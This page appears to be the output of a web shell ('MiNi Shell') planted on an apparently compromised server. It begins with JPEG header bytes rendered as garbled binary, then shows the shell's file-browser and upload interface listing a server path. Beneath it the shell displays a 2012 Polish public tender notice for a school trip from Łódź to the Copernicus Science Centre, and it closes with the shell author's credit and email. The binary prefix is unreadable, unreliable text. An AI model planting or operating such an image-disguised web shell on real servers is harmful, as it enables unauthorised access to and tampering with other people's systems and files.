JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120223/54442-N-2012.html

<p class="kh_header"><b>Łódź: Usługi turystycznej - zorganizowanie wycieczki edukacyjnej dla uczniów Szkoły Podstawowej nr 81 w Łodzi w ramach projektu Wiedza - szansą na lepsze życie</b><br>
<b>Numer ogłoszenia: 54442 - 2012; data zamieszczenia: 23.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 81 , ul. Emilii Plater 28/32, 91-762 Łódź, woj. łódzkie, tel. 42 6561909, faks 42 6561909.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi turystycznej - zorganizowanie wycieczki edukacyjnej dla uczniów Szkoły Podstawowej nr 81 w Łodzi w ramach projektu Wiedza - szansą na lepsze życie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Usługi turystyczne - Organizacja  wycieczki edukacyjnej dla uczniów Szkoły Podstawowej nr 81 w Łodzi w ramach projektu pn. Wiedza- szansą na lepsze życie współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego:
  -   Wycieczka dla uczniów do Centrum Nauki Kopernik w Warszawie (wyjazd 1-dniowy);
2. Zamówienie jest realizowane w ramach projektu Wiedza- szansą na lepsze życie numer POKL.09.01.02-10-371/09-00 współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego POKL Priorytet IX, Poddziałanie 9.1.2 
3.Realizacja przedmiotu umowy jest współfinansowana przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
4. Wycieczka edukacyjna dla uczniów uczestniczących w zajęciach pozalekcyjnych z nauk matematyczno- przyrodniczych do Centrum Nauki Kopernik w Warszawie (wyjazd 1-dniowy)
-Termin wycieczki: 24.03.2012 r.
-Liczba uczestników: 100 uczniów w wieku od 7 do 12 lat + 6 opiekunów 
-Wycieczka ma obejmować  uczestnictwo w zajęciach w Centrum Nauki Kopernik 
5.W ramach niniejszego zamówienia oraz podanej ceny ofertowej Wykonawca zobowiązany jest zapewnić dla wycieczki :
-Transport uczestników z placu przed Szkołą Podstawową nr 81 w Łodzi ul. E. Plater 28/32 miejsca docelowego o godz. 7:00 i z powrotem. Planowany powrót do Łodzi 21:00
-Wstęp (w tym opiekę przewodnika/ów na terenie Centrum Nauki Kopernik, oraz biletów wstępu na wszystkie możliwe atrakcje dla wszystkich uczestników - łącznie z opiekunami) do miejsc docelowych.
-Przejazd komfortowym autokarem (rozkładane fotele, indywidualne nocne oświetlenie, nagłośnienie z mikrofonem, klimatyzacja, woreczki na nieczystości).
-Opiekę pilota.
-Wyżywienie wszystkich uczestników (w pobliżu lub na terenie Centrum Nauki Kopernika): obiad dwudaniowy z menu uwzględniającym preferencje dzieci w wieku szkolnym.
-Miejsca parkingowe z poniesieniem wszystkich opłat parkingowych przez Wykonawcę.
-Przejazd środkami komunikacji, jeśli to konieczne oraz wszelkich innych opłat związanych z programem wycieczki.
-Ubezpieczenie uczestników wyjazdu (uczniów i opiekunów) ubezpieczeniem NNW w wysokości min. 10 000,00 zł/osobę.
6.W ramach organizacji wycieczki do Centrum Nauki Kopernik w Warszawie Zamawiający żąda:
-przedstawienia planu wycieczki z podaniem godzin, 
-lokalizacji zagwarantowanego obiadu 
-oraz przedstawienia planu zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę
uprawnienia do wykonywania określonej działalności lub czynności Zamawiający żąda
zaświadczenia o wpisie do rejestru organizatorów turystyki i pośredników turystycznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym do wykonania zamówienia Zamawiający żąda wykazu wykonanych dwóch usług  organizacji wycieczek krajowych dla grupy minimum 100 osobowej w okresie ostatnich 3 lat (jeżeli okres prowadzenia działalności jest krótszy, w tym okresie), z podaniem ich wartości oraz daty i miejsca wykonania na wykazie stanowiącym Załącznik Nr 6 do SIWZ oraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. Do wykazu proszę załączyć dwie referencje lub inne dokumenty potwierdzające należyte wykonanie dotyczące ww. usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu
na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z
treści załączonych dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca
spełnił - Załącznik 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu
na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z
treści załączonych dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca
spełnił - Załącznik 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu
na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z
treści załączonych dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca
spełnił - Załącznik 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentacji podmiotów występujących wspólnie w postępowaniu o udzielenie
zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego - w przypadku konsorcjum lub spółki cywilnej SPOSÓB POROZUMIEWANIA SIĘ
ZAMAWIAJĄCEGO Z WYKONAWCAMI 1. Postępowanie o udzielenie zamówienia prowadzi się w języku
polskim. 2. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy mogą
przekazywać w godzinach pracy Sekretariatu od godziny 9:00 do godziny 12:00 : 2.1 Faksem (numer faksu
(42) 6561909 w zakresie wszelkiej korespondencji między stronami, z wyłączeniem złożenia oferty dla
której wymagana jest forma pisemna; 2.2 Drogą elektroniczną (adres internetowy Zamawiającego):
www.sp81.edu.lodz.pl, www.sp81lodz.home.pl a) ze strony Wykonawcy - w zakresie dotyczącym
pobierania elektronicznej wersji specyfikacji istotnych warunków zamówienia, zwanej również SIWZ oraz
możliwości zapoznania się z treścią pism skierowanych do Wykonawców; wskazane powyżej dokumenty (z
wyłączeniem ofert) należy przesłać dodatkowo drogą elektroniczną na adres e-mail Zamawiającego:
szkola81@onet.pl Pytania i prośby o wyjaśnienie treści SIWZ należy przesyłać w formacie WORD. b) ze
strony Zamawiającego - w zakresie udostępnienia elektronicznej wersji specyfikacji istotnych warunków
zamówienia oraz umieszczania treści pism skierowanych do Wykonawców na stronie internetowej
Zamawiającego www.sp81.edu.lodz.pl, www.sp81lodz.home.pl</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z
zachowaniem formy pisemnej pod rygorem nieważności. 2. Zamawiający zgodnie z art. 144 ustawy Prawo Zamówień Publicznych, przewiduje możliwość dokonania nieistotnych zmian postanowień zawartej umowy
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia
co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich
wprowadzenia. 1.) Zmiana Terminu Wykonania Umowy 1.1) zmiany spowodowane warunkami
atmosferycznymi, które uniemożliwiają organizację wyjazdu, w szczególności: a) klęski żywiołowe; b)
warunki atmosferyczne odbiegające od typowych dla danej pory roku, uniemożliwiające bezpieczny
przewóz uczestników; 1.2.) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami związanymi z
finansowaniem projektu przez instytucje finansujące, w szczególności: a) brak środków na finansowanie
projektu; b) zmiany w projekcie wynikające z przyczyn leżących po stronie instytucji finansujących; 1.3.)
zmiany będące następstwem przypadków losowych, które spowodowały niezawinione i niemożliwe do
uniknięcia opóźnienie, w szczególności: a) wypadki i choroby uczestników wycieczki (epidemie, zatrucia,
itp.); 1. 4) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące
niemożliwością czynności przewidzianych Umową, które spowodowały niezawinione i niemożliwe do
uniknięcia przez Wykonawcę opóźnienie. W przypadku wystąpienia którejkolwiek z okoliczności
wymienionych w pkt 1.1 - 1.4 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas
niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty. 2.) Zmiana sposobu spełnienia
świadczenia przez wykonawcę 2.1) Zmiany osobowe - zmiana osób, przy pomocy których Wykonawca
realizuje przedmiot umowy na inne - spełniające warunki określone w specyfikacji istotnych warunków
zamówienia, według polityki kadrowej Wykonawcy; 2.2) Zmiana programu wycieczki wynikająca z przyczyn
nie leżących po stronie Wykonawcy. Zmiana osób jest możliwa na osoby spełniające wymogi SIWZ, a dla
skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę. Zmiana
programu jest możliwa po przedstawieniu uzasadnienia i nowej propozycji programu przez Wykonawcę i
zatwierdzeniu przez Zamawiającego. Nowy program nie może ustępować pod względem organizacyjnym i
dydaktycznym programowi załączonemu do oferty. 3.) Pozostałe zmiany spowodowane następującymi
okolicznościami: a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ; b)
zmiana obowiązującej stawki VAT; c) zmiana sposobu rozliczania umowy lub dokonywania płatności na
rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie Projektu lub
wytycznych dotyczących realizacji Projektu; d) gdy zaistnieje inna okoliczność prawna, ekonomiczna lub
techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ; 3. W
przypadku określonym w ust 2 pkt 3) b zmiana stawki VAT dotyczyć będzie Wynagrodzenia Umownego, w
części, jakiej dotyczą te zmiany przepisów. 4. W przypadku określonym w ust 2 pkt 3) c zmiany dostosują
sposób rozliczeń lub płatności do wymogów zmienionej umowy o dofinansowanie Projektu lub nowych
wytycznych dotyczących realizacji projektu. 5. Wszystkie powyższe postanowienia w ust. 2 punkty 1), 2) i
3) stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie
zobowiązania do wyrażenia takiej zgody. 6. Nie stanowi zmiany umowy: a) zmiana danych związanych z
obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego), b) zmiana ilości uczestników wycieczki, c) zmiany danych teleadresowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp81.edu.lodz.pl, www.sp81lodz.home.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariacie Szkoły
Podstawowej Nr 81 w Łodzi, 91-762 Łódź, ul. Emilii Plater 28/32,...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2012 godzina 09:00, miejsce: Gabinecie Dyrektora Szkoły Podstawowej Nr 81 w Łodzi, 91-762 Łódź, ul. Emilii
Plater 28/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach projektu Wiedza- szansą na lepsze życie numer
POKL.09.01.02-10-371/09-00 współfinansowanego przez Unię Europejską w ramach Europejskiego
Funduszu Społecznego POKL Priorytet IX, Poddziałanie 9.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com